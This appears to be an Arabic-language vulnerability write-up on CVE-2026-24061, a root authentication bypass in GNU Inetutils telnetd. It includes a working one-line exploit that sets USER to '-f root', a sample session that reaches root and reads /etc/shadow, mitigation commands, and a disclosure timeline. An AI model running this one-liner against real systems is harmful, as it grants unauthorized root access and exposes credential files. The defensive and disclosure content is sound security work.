
CVE-2026-24061
خطأ تجاوز المصادقة عن بُعد خطير في telnetd من GNU Inetutils
عاد شبح عام 2015 ليمتلك كل شيء لا يزال يشغل telnet.
لا مصادقة. متغير بيئة واحد. شل الجذر فوري.
CVE-2026-24061 هو ثغرة تصعيد صلاحيات عن بُعد خطيرة في GNU Inetutils telnetd ≤ 2.7.
يقوم مهاجم عن بُعد غير موثوق بتعيين متغير البيئة USER إلى "-f root" عبر خيار Telnet NEW-ENVIRON.
يمرره telnetd دون تنقية مباشرة إلى /bin/login → يرى login -f root → يتجاوز جميع عمليات المصادقة → يلقي بالمهاجم في شل جذر.
بقي الكود الخطير هادئًا في الشجرة لمدة تقريبًا 11 عامًا (منذ حوالي 2015).
"متغير بيئة واحد. لا كلمة مرور. جذر كامل. مرحبًا بك في 2026."
الواقع في مارس 2026:
عندما يتلقى telnetd خيار NEW-ENVIRON يحتوي على:
USER=-f root
يقوم بإلحاق القيمة مباشرة إلى argv الممرر إلى /bin/login:
execve("/bin/login", ["login", "-f", "root", ...], ...)
يفسر binary login -f root على أنه:
"هذا المستخدم قد تمت مصادقته بالفعل كجذر — لا حاجة للتحقق من كلمة المرور."
→ يحصل المهاجم على موجه #. انتهت اللعبة.
الاختيار التصميمي القاتل الرئيسي: لم يتم تقييد إعادة توجيه -R / متغيرات البيئة للمستخدمين المصرح لهم أبدًا.
الإصدارات الضعيفة: GNU Inetutils telnetd 1.9.3 – 2.7
الأهداف الشائعة في 2026:
آمن:
سطر واحد (أي Linux/macOS مع عميل telnet):
USER="-f root" telnet -a 192.168.1.50
المخرجات النموذجية:
┌──(attacker㉿kali)-[~]
└─$ USER="-f root" telnet -a 192.168.1.50
Trying 192.168.1.50...
Connected to 192.168.1.50.
Escape character is '^]'.
Debian GNU/Linux 12 telnetd
root@legacy-box:~# whoami
root
root@legacy-box:~# id
uid=0(root) gid=0(root) groups=0(root)
root@legacy-box:~# cat /etc/shadow
...
بضغطة مفتاح Enter واحدة لاحقًا — وصول كامل إلى الجذر.
telnet localhost 23 # look for inetutils banner
inetutils-telnetd --version # vulnerable if ≤ 2.7
systemctl disable --now inetutils-inetd # or telnet.socket
pkill telnetd && chmod -x /usr/sbin/telnetd
sudo apt update && sudo apt install --reinstall inetutils-telnetd # → ≥2.8
iptables -A INPUT -p tcp --dport 23 -j DROP
ufw deny 23/tcp
| التاريخ | الحدث |
|---|
| ~مارس 2015 | تم إدخال معالجة البيئة الضعيفة |
| يناير 2026 | تقرير خاص إلى المطورين |
| أواخر يناير 2026 | الكشف العام وتعيين CVE |
| أواخر يناير 2026 | إصدار الإصلاح (Inetutils ≥ 2.8) |
| 26 يناير 2026 | تمت الإضافة إلى كتالوج الثغرات المستغلة المعروفة لـ CISA |
| فبراير–مارس 2026 | ارتفاع الاستغلال ضد أنظمة legacy/OT |
| مارس 2026 | لا يزال العديد من بائعي الأنظمة المضمنة صامتين أو غير مصححين |